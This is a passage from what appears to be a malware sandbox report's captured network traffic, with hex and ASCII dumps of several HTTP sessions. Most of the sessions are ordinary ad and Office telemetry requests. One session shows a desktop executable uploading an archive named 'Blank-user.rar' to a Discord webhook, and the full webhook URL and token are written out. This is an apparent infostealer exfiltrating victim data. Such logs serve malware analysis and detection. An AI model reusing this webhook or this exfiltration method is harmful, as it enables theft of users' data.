Q(a,b,c){a.addEventListener&&a.addEventListener(b,c,!1)};function ua(a,b){a.src=ra(b);var c,d;(c=(b=(d=(c=(a.owner
2024-10-31 18:19:46 UTC	1378	IN	Data Raw: 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 62 67 2f 22 2c 22 2e 6a 73 22 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 67 3d 77 69 6e 64 6f 77 3b 67 3d 67 3d 3d 3d 76 6f 69 64 20 30 3f 77 69 6e 64 6f 77 3a 67 3b 74 68 69 73 2e 4a 3d 62 3b 74 68 69 73 2e 68 3d 67 3b 74 68 69 73 2e 6f 3d 63 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 63 3b 74 68 69 73 2e 69 3d 28 64 3d 3d 3d 76 6f 69 64 20 30 3f 30 3a 64 29 3f 50 28 7a 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 3a 50 28 41 61 2c 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 61 28 61 29 7b 72 65 74 75 72 6e 20 49 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 73 77 69 74 63 Data Ascii: ad2.googlesyndication.com/bg/",".js"]);function R(a,b,c,d){var g=window;g=g===void 0?window:g;this.J=b;this.h=g;this.o=c===void 0?0:c;this.i=(d===void 0?0:d)?P(za,encodeURIComponent(a)):P(Aa,encodeURIComponent(a))}function Ba(a){return I(function(b){switc
2024-10-31 18:19:46 UTC	1378	IN	Data Raw: 78 74 3a 46 61 28 61 2e 5f 63 74 78 5f 29 2c 41 3a 61 2e 5f 62 67 76 5f 2c 76 3a 61 2e 5f 62 67 70 5f 2c 47 3a 61 2e 5f 6c 69 5f 2c 46 3a 61 2e 5f 6a 6b 5f 2c 48 3a 47 61 28 61 2e 5f 73 74 5f 29 2c 49 3a 61 2e 5f 72 63 5f 2c 6f 3a 61 2e 5f 64 6c 5f 2c 44 3a 61 2e 5f 67 32 5f 2c 6a 3a 48 61 28 61 2e 5f 61 74 71 67 5f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 3b 69 66 28 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 29 72 65 74 75 72 6e 20 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 5b 30 5d 3b 76 61 72 20 62 3d 6e 65 77 20 72 2e 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 3d 5b 62 2c 63 5d 7d 29 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 Data Ascii: xt:Fa(a._ctx_),A:a._bgv_,v:a._bgp_,G:a._li_,F:a._jk_,H:Ga(a._st_),I:a._rc_,o:a._dl_,D:a._g2_,j:Ha(a._atqg_)}}function Ja(){var a=window;if(a.GoogleDX5YKUSk)return a.GoogleDX5YKUSk[0];var b=new r.Promise(function(c){a.GoogleDX5YKUSk=[b,c]});return b}funct

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	51249	216.58.206.34	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:47 UTC	1714	OUT	GET /pagead/sodar?id=sodar2&v=232&t=2&li=gda_r20241028&jk=2973902258960805&bg=!AwClAE_NAAbaVSD0-lU7ADQBe5WfOOSEgobHspmagji4Y34gS8GJxK4N_jAIGL6FgE-DDSuV5fNfn28dWYbLGun4_afSAgAAATRSAAAADGgBB34ANg_X2_piADoLfOqQQOA8NQKwAekuWzLVSuvoZLdd9eSdIJhrEzYRQYrSQVNS4YxqZD2N3GDoJJkCi95yxmhkSPeChUOagxj1MFy128Rv2EjffhT3l0gLNc43dHQBfjHco6DJRljtjnyAJIbprnUdZt1_KyspGIAxKfF7p61aOLOh6u3TF5-FQl3df5efpW3A_hU2Plmm-xpsCfkGwUsglHrOVnxxTO3ozIS5Xzqi6WG9lBvCiiyCSYTli35DUgxD9AzLi5TOpENxVcEnsCNL1IOalk2WQTvxulNxnzaL1p7kRztXT3PPhFXb_EYwZFPYUe0I6SS6_klRTkwcXvcTzTkgjqklzI62G4vqfgXSa0XSIcOCOoxDV0KPvId1x6eSFQouSf-0QkhZti772W9DUIknqtPAYLXuwfemZpxLt-Ep9WMfkI4aEdYO24YcOhF9Touj1m1lMPcP6lHuexteUdlxGoFUWDzY8WUE6ntRHFmCDTsyZSK2GVSDb8qM1RpgokmVxrp2JAEwo5Q60GcbC7Ez-tU64s0CGfYIfZa3SPMzPnK53cbZLwygjd7foVHdYKhPb6uU9KBgrr_G6q63CkdVOpuiAAdpkoQYwEHw9Qjdxo2IOMFVYKUtGwblDooJHK4k014izc_yji9Va9fyJLOaKHBiXvm1Yv8ZIcee5tHO6B4yCOPCAqaHmjA4YEd7G1iUDV-6SZPKRAsfigzzW8_h2soSKvx1cemtz-dQkfTHaIEOgRD5nigJZioZR9U5t7mGUUHwMMFtPNj38Y_PUytjC_UXE9oGOLui9DttgCsPIf-FLgD48-SRfhuU4lM4v [TRUNCATED] Host: ep1.adtrafficquality.google Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:48 UTC	451	IN	HTTP/1.1 204 No Content P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:47 GMT Server: cafe Content-Length: 0 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	51253	162.159.128.233	443	7532	C:\Users\user\Desktop\El9HaBFrFM.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:56 UTC	302	OUT	POST /api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7 HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 387781 User-Agent: python-urllib3/2.2.3 Content-Type: multipart/form-data; boundary=cb25b7fe18ed525b51a049198d45ca7f
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: 2d 2d 63 62 32 35 62 37 66 65 31 38 65 64 35 32 35 62 35 31 61 30 34 39 31 39 38 64 34 35 63 61 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 70 3f 09 c0 21 04 00 00 01 0f 52 4c 66 6b 9f 93 a8 23 63 c9 2f 02 cc 5d dc aa b0 54 12 a7 ad 0c 23 f1 fa 69 7d e4 eb 77 6b f7 8e 52 21 97 f1 cc 1c 9e 38 d5 53 8e 80 c1 5c b5 2f 30 7c 68 5f 47 3b 2d 6e df 01 94 9c 1c 4c 23 59 ec 6f cb cb d1 49 8e 94 a0 01 09 c9 56 2d 29 6d 2a 90 cf e3 d0 Data Ascii: --cb25b7fe18ed525b51a049198d45ca7fContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!p?!RLfk#c/]T#i}wkR!8S\/0\|h_G;-nL#YoIV-)m*
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: e5 07 83 3a 5b 53 30 60 a3 dc 49 6d bd bd 02 28 d7 0b 52 2e 9b 4a f0 2c af 03 a0 73 f1 7c 59 1a 6c 55 66 c6 d9 0e 8c 3b ea 9f 47 cf 7e ae 50 f1 da 7c 73 c6 bf 8a a2 cb 5e b2 18 54 3c 73 a8 95 34 31 cf 60 a9 b2 28 02 c7 b9 5d 02 d2 c1 0b 23 40 09 35 83 40 9d 8d 39 a4 d6 7d 43 09 1a 0d 98 40 dc 9e ed d6 13 69 12 1e 84 35 2e 36 fe 52 85 0b 5f ce a0 3f 29 93 45 46 87 96 e0 3d 1d 91 22 59 e3 fd 93 f6 8e f2 89 93 23 91 e2 f8 e4 2c 31 b2 c3 56 b8 a1 f7 7e 5f 56 ad 5d 6c 3d ac 6a 83 bd 31 a4 83 01 56 62 e8 b3 13 c4 8b 5d 93 eb 31 35 2f a4 95 e0 2b fc 42 20 8e 35 ea d3 9e 27 37 0b 27 be 51 22 d3 9c 69 10 98 2f 12 f0 f7 e2 be 25 f2 58 76 7b 8f ac 26 2f a1 e1 e6 bd bd 42 eb 5b 7c 4c e7 65 10 91 37 84 e0 93 f1 9c 53 f9 33 d3 a9 08 72 16 57 6c 61 fa 8a b7 c1 2d 5d 22 Data Ascii: :[S0`Im(R.J,s\|YlUf;G~P\|s^T<s41`(]#@5@9}C@i5.6R_?)EF="Y#,1V~_V]l=j1Vb]15/+B 5'7'Q"i/%Xv{&/B[\|Le7S3rWla-]"
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: db 9a c0 07 48 7a 83 ef 24 6d 81 57 01 30 48 d7 f4 22 6a 0e 7f 4c ff 8d 27 2f 2e 74 64 fb 7e 6d a2 ae 6a 56 69 07 ff 8a f0 53 ae 8f 7b 53 59 16 0f 36 23 53 c7 b1 31 60 85 4a 48 db 93 22 ca d9 b2 86 7c 34 1c 22 2e fc 74 7a 30 cd 22 73 2a 84 4b 6e be 18 d9 2b b5 29 60 21 63 e2 48 17 e1 96 fc 26 ce ba ac 93 6a 8d 1c 31 7d f3 10 7c f8 ce 5d d9 c3 13 5f 4d 26 a1 c0 a2 99 f5 bf 8d 2a b4 69 60 7e 37 16 e6 26 62 05 a5 ff 41 e1 4b 27 01 cf 48 1a f9 67 3b 66 f4 dd 69 d3 32 09 9c dc bf f9 5f 48 d1 e2 c9 38 9d bf 89 08 57 37 53 f3 fb 67 0a 5f 8b aa 4d 3f 8e d7 ea a8 42 ab 7d 6a bc d7 50 30 09 5e 55 2f ac e6 4b 8c 97 0b 4f 24 3a 36 97 0a 7e 3b 1a 18 f8 3c ec a2 d1 6f f9 38 79 8d 5a 58 2f 10 60 36 49 fa 5a 7a 65 fd 33 f2 09 81 0e e3 f4 07 4e 33 62 f7 59 cf d3 6d 18 a5 Data Ascii: Hz$mW0H"jL'/.td~mjViS{SY6#S1`JH"\|4".tz0"sKn+)`!cH&j1}\|]_M&i`~7&bAK'Hg;fi2_H8W7Sg_M?B}jP0^U/KO$:6~;<o8yZX/`6IZze3N3bYm
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: c2 15 d4 96 67 0d e5 a3 d1 a5 04 4e da b3 9a 23 66 20 c6 ac a6 5d 6c db 4a a9 22 92 1e df fd 91 7e fc 61 70 12 74 2b c1 e0 59 47 3a a2 da 81 b4 d0 e2 14 b9 75 f8 21 00 de 2e 18 b5 e4 6e 68 ab 08 41 58 73 ab 39 5c d5 e0 db dc ad 31 83 1a 6b 7e 3c c0 fc 13 70 54 99 1f b8 04 32 97 cb 81 95 b5 3e ed 90 2a c7 bf 16 46 31 62 af 70 68 54 f2 32 ef 46 d4 b3 7e 39 49 1f 69 a2 d9 83 c2 43 52 89 40 86 24 ca 99 ab 85 33 bf 1f ba cf ff f4 5c 59 72 af af a7 ea e3 ab a2 73 1a 81 40 fd cc 22 fb 06 1c b5 d1 47 59 c2 45 81 62 47 2c 16 73 cc fd c8 83 16 a0 b4 16 32 24 fc b3 52 54 f3 8e c3 27 b3 02 4e 6e 3b 6a f6 64 3d 7e db 32 75 1e 35 d4 31 9b f7 12 35 9b 99 a3 a8 e6 14 b9 cc df 71 48 2f 80 ee 01 82 be f9 7a 08 95 9f 6a 55 65 e2 e7 25 68 cf 80 b3 c9 5f 73 28 8c c6 f1 08 56 Data Ascii: gN#f ]lJ"~apt+YG:u!.nhAXs9\1k~<pT2>*F1bphT2F~9IiCR@$3\Yrs@"GYEbG,s2$RT'Nn;jd=~2u515qH/zjUe%h_s(V
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: 21 84 3a 19 08 30 b1 7f 77 3e 29 ac dc ab 67 f9 2d 59 d6 52 c2 80 da 65 77 59 0b 53 04 68 e7 7b 21 ec d9 50 4f 92 b2 da 3b 9f c1 1f 59 37 39 e2 ec 98 92 96 b2 2b 5e 7c 75 f7 2d 67 89 0f 17 89 f4 bd 0b 21 2e fe 80 af 63 99 12 ec e7 da ad 43 33 18 81 bd 4d be 5e 60 f9 25 cd 57 91 9f 6b c8 38 32 13 7a e6 2a eb 61 8b e2 8c 41 52 e9 77 78 69 0a 19 91 2f 93 d6 07 8f ff af 2c 5e bf 53 02 b7 ff 0d 76 b2 2d 80 b5 1b 70 08 ee f7 59 89 b9 ec fb a7 09 5e 06 62 e4 d5 ad ad 9c 1f 52 02 54 ec ed 5f a6 ec 8a 50 8a 6e 1d aa bc 44 c3 d5 38 ad a7 23 4c 14 6f db aa 48 b4 5f 7a 17 d5 29 9e 07 38 5b 6a 55 59 66 1e 4d 93 fd fe e4 66 2b 3d b1 af e1 a6 fc dd d8 7b 71 d2 01 ef 2a 09 2d 49 20 fe f9 b2 5d 4d 3a 5a 32 72 4d 4e 3f 13 98 4e 94 08 23 c9 52 57 d4 2d 7e 2c 57 e9 02 22 aa Data Ascii: !:0w>)g-YRewYSh{!PO;Y79+^\|u-g!.cC3M^`%Wk82zaARwxi/,^Sv-pY^bRT_PnD8#LoH_z)8[jUYfMf+={q-I ]M:Z2rMN?N#RW-~,W"
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: 71 44 bf 1e 2b 0b b0 50 6b ca 6d 53 23 f6 43 61 ef 2c 7a a5 9d 75 c2 5b 17 59 9f 5d 05 9e 24 ba 9e be c1 f8 34 00 f4 d5 00 80 50 c4 d7 ef ee 65 45 e8 14 38 28 89 c7 60 3b 5e 97 63 95 a7 87 f7 c3 ef 08 b3 d5 3a 2b 97 ab b5 75 e5 74 ff 7e 33 d5 73 01 a2 79 20 87 e8 e7 8a d4 d1 04 cf eb 83 e3 33 65 cc bc 07 0f 24 ff f5 23 aa e9 4a 66 8a 42 e2 14 1c ba 44 c6 2f 1f 99 84 c4 89 52 8e 84 25 ef ea 5f a3 e6 ea ba 3e f7 74 5a d5 4f b7 76 6f 02 eb bc b5 a4 da a6 16 b5 09 64 35 40 55 12 d9 93 62 fe c8 4e 4b 4e 89 7d 69 24 a8 64 b1 81 d1 9c e5 20 57 86 97 a2 12 75 ae 88 e4 e7 dc 28 0f 8f 55 be 13 97 cf ee 62 15 bd 1a 45 ae a4 71 eb 77 9f 0c 7d 8b db c8 a7 e7 89 68 68 ff 73 d6 40 80 90 f2 c5 84 65 98 74 6e 47 d5 1f 49 42 e5 7b 4b 8f a6 29 7c 8f 41 d4 67 d2 37 b6 df 60 Data Ascii: qD+PkmS#Ca,zu[Y]$4PeE8(`;^c:+ut~3sy 3e$#JfBD/R%_>tZOvod5@UbNKN}i$d Wu(UbEqw}hhs@etnGIB{K)\|Ag7`
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: 7f 9f 6c 20 fb 40 77 b8 f5 2a 15 bd a0 cb 91 1e e7 a5 1d 79 f6 9b 3d 6b 00 05 14 e5 29 ae c2 e4 9d 52 23 91 e1 1e d6 84 ac 38 0a d5 7c 84 cf b8 89 f6 9c 4b fd cc e6 f7 07 8e e7 2a bd 5d 44 93 b8 43 c2 d3 53 02 7d 68 c7 1f c9 00 15 26 57 4d cd f4 30 a2 1a fc e8 18 57 98 a1 86 c0 a3 22 a2 2c 64 09 f2 e5 47 75 a8 1b 51 13 c9 dc fd e1 3b 1c 6b 78 de 40 ad 79 15 cc 31 0a 26 fe 0f 24 21 4f 2f f3 fd d2 5d 32 4a 7f 8a 77 42 2c 98 a3 b8 5f 86 41 43 01 f0 b7 8c 69 e5 96 4b c9 77 ad b7 7f 1e d5 be 2c 10 00 0a 6f ce 06 0d 0b d7 0a 8f b9 47 b9 31 ae a7 0f 55 7b cd e6 cd cb 4f fb d2 30 2a ea 2b 16 78 ea b4 b7 49 aa d7 11 6e c7 c0 48 b2 49 3b fc aa 4d d7 82 ef 43 2a f4 d4 96 bf 4a 3b 81 ce 03 d9 97 08 98 8f 3c 61 02 7d eb 6b a1 46 8d aa 7e f3 4f 0b 55 32 65 42 45 48 68 Data Ascii: l @wy=k)R#8\|K]DCS}h&WM0W",dGuQ;kx@y1&$!O/]2JwB,_ACiKw,oG1U{O0+xInHI;MCJ;<a}kF~OU2eBEHh
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: 34 d6 50 6f 02 c5 49 bb 04 b9 6b 1f 99 f9 fc 43 c6 91 6a f4 31 fc 0c 81 ea a3 8c b7 dd 67 d8 13 5b fa c4 dc da ab d2 41 86 44 a1 b2 b6 a3 a8 52 24 0f 78 18 95 52 7e 3d 3f 13 8c be c8 77 1a 20 d9 73 96 f8 a7 41 b8 dc 56 04 84 c3 76 25 12 87 6e e6 fa c3 b1 73 eb 35 5c 2f f9 62 e6 4e 2f 51 66 99 58 0a 00 55 ad 0d e4 f6 ad aa 6b fe 8d 2c 2c 47 76 63 7e 94 18 62 0c b3 87 9b 2d c5 c8 10 a7 2b 26 2b 35 ad 00 4c c5 7c 77 ba 0b 94 be 41 4d f6 40 e6 b1 03 30 e2 b8 8e 9d da f5 5f a8 5f 2d 92 06 ff 07 9f 41 65 5b 30 b4 9a 87 7b a6 f5 47 44 4f 2d 10 02 46 12 dd ce b4 cb b5 dc ce fe 54 ee a6 03 4d bf 6e 61 59 db a9 c3 ae fd 2d 36 d2 88 3c 54 21 1a 9d 95 47 ef 0d f3 7c 07 88 67 2b 73 24 88 18 72 50 e8 d9 ba 81 78 f0 17 94 27 f9 07 e5 9c f5 fb da 01 94 09 74 12 bd f4 95 Data Ascii: 4PoIkCj1g[ADR$xR~=?w sAVv%ns5\/bN/QfXUk,,Gvc~b-+&+5L\|wAM@0__-Ae[0{GDO-FTMnaY-6<T!G\|g+s$rPx't
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: c9 80 f3 3d c6 7f 02 bb b9 dd f0 4c 38 00 d4 ab c4 cc b5 df e2 c4 8e 4a 50 95 98 1d 2a fa ee b0 c3 10 9b bf ec 64 b4 98 cb 82 0c 33 d2 06 9b a1 13 10 c2 4a 8c 1c 88 fc 9f 10 05 62 97 7e 26 9e b6 b2 cd 93 83 f2 12 d8 f7 06 51 84 1b 41 07 1e ff c7 be f5 91 00 9b 72 05 84 6f 4e a3 54 39 13 af 52 09 59 05 f2 37 ed 0f a0 ee a3 2a 81 68 a1 69 1d 3c f5 23 d1 58 0d 3d d8 31 c9 c4 44 aa fb 77 60 26 7d 52 f0 b7 1a a9 20 7f b2 72 12 67 b5 88 d4 dd 66 de de fa 24 91 a1 80 32 80 92 d6 4c 0c f9 0b 31 72 3d 9a 54 f3 5a c0 87 97 30 25 fa 82 a3 d1 de 26 f9 34 f6 e3 cb 7e 5b 16 21 d4 f5 39 ff 06 c5 a7 12 e1 98 28 5c 15 83 42 39 7a 8d 19 0d d4 66 e8 76 18 54 94 53 23 34 2b f6 19 51 fa 1d 45 a8 e5 6f 6a 6e 42 a5 5a 94 5e d8 b8 7c 3f ed 21 9a 95 4d ef 88 32 82 8d 9b 9b 68 3c Data Ascii: =L8JPd3Jb~&QAroNT9RY7hi<#X=1Dw`&}R rgf$2L1r=TZ0%&4~[!9(\B9zfvTS#4+QEojnBZ^\|?!M2h<
2024-10-31 18:19:56 UTC	16384	OUT	Data Raw: 63 3c 00 09 5c 45 3f d0 43 56 35 dc 27 00 7c c3 57 e4 2e 3f ca 50 9a 7f 27 ee 68 fc f1 52 a8 7b 9d 7a 3b 19 bd 2c 18 b6 31 9b e1 6d a4 e0 8a ab 6d bf 69 92 81 fd d1 e9 bd d1 62 74 37 67 45 46 d5 4e c5 02 3f 70 b3 1d 0c f2 d3 55 62 04 ac 3d ac 41 55 9c 2d d2 7a a3 88 9a 78 9a 9c 15 6e 67 2f bb 64 30 9d 3a 59 95 82 86 44 99 d8 4e 36 e9 d6 f2 50 a6 7d 13 62 61 b0 82 d7 6e fd 9a 5a 6a 8b 5c 6c 7f 6e 2d e0 47 a6 df b7 ac 2f fc 78 68 c8 9a 0b 20 9e 69 de 76 a2 59 82 b7 b9 a1 45 20 2e e9 7e 05 83 2a 1b b9 70 0c e1 5e c2 41 cb 74 74 90 57 5c 18 99 b3 62 56 6c fe 17 28 02 b6 dd 2e 2c e9 3d b0 c7 5d ce d1 5d b6 38 84 5f 5f 6e 24 c7 96 e5 7b 8c 38 87 e9 7b 07 75 18 49 ea cf d1 f6 aa 92 01 90 8d 67 d4 32 93 af 11 f4 9a c4 13 81 b6 06 bc 37 49 45 0a 84 68 7b 55 8a 8a Data Ascii: c<\E?CV5'\|W.?P'hR{z;,1mmibt7gEFN?pUb=AU-zxng/d0:YDN6P}banZj\ln-G/xh ivYE .~*p^AttW\bVl(.,=]]8__n${8{uIg27IEh{U
2024-10-31 18:19:57 UTC	1255	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:19:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Set-Cookie: __dcfduid=bc0a35bc97b411ef83edba4227b15c03; Expires=Tue, 30-Oct-2029 18:19:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1730398798 x-ratelimit-reset-after: 1 vary: Accept-Encoding via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqZsnsFNiu3PMjzP25hQVOEcsP0qQTHtO8AF2EuLsKA1tp%2FGb6MTf%2FuDOHIZW9GeajjevZPKq%2BQHYIfnU1oDwo5KZvgJv3x0BR4Z2%2Bijp8mVahTdLEIiG6TeqTKw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=bc0a35bc97b411ef83edba4227b15c0386b6dfc36bd1421e3d75544fe53b03bc05d6510a720f6f3ed2f9a77aefabd99c; Expires=Tue, 30-Oct-2029 18:19:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	51254	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:00 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:00 UTC	561	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:00 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public Last-Modified: Wed, 30 Oct 2024 23:56:08 GMT ETag: "0x8DCF93E6CAB67A0" x-ms-request-id: 3ed0e151-601e-0032-5264-2beebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182000Z-16849878b78fhxrnedubv5byks000000088g00000000934z x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:00 UTC	15823	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
2024-10-31 18:20:00 UTC	16384	IN	Data Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
